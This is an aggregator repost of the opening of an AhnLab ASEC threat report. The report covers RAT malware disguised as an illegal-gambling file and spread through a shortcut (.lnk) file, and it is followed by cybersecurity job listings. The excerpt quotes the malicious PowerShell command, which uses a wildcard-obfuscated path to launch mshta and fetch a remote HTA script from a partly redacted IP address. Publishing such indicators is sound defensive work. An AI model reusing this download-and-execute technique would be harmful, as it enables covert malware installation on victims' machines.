Feb. 7, 2024, 2:01 a.m. | MalBot

Malware Analysis, News and Indicators - Latest topics malware.news

AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA.



Figure 1. Operation process



The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script.



  • PowerShell command

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.*  ‘hxxp://193.***.***[.]253:7287/2.hta.hta’




    Figure 2. LNK properties





The malicious …

ahnlab asec center disguised distributed distribution downloads file gambling hta illegal intelligence lnk malware malware analysis process rat rat malware security security intelligence venomrat

Sr. Splunk Engineer | Remote, USA

@ Optiv | Illinois

DevSecOps Engineer

@ Johnson Controls | Johnson Controls (I) CoEE,Pune

DevSecOps Engineer- Mobile Solutions

@ ZF Friedrichshafen AG | Chennai, TN, IN, 600116

Penetration Testing Principal Consultant

@ Horangi | Thailand

Penetration Testing Team Lead - SG

@ Horangi | Singapore

Penetration Testing Engineer III

@ Boliden | (USA) AR BENTONVILLE Home Office ISD Office - DGTC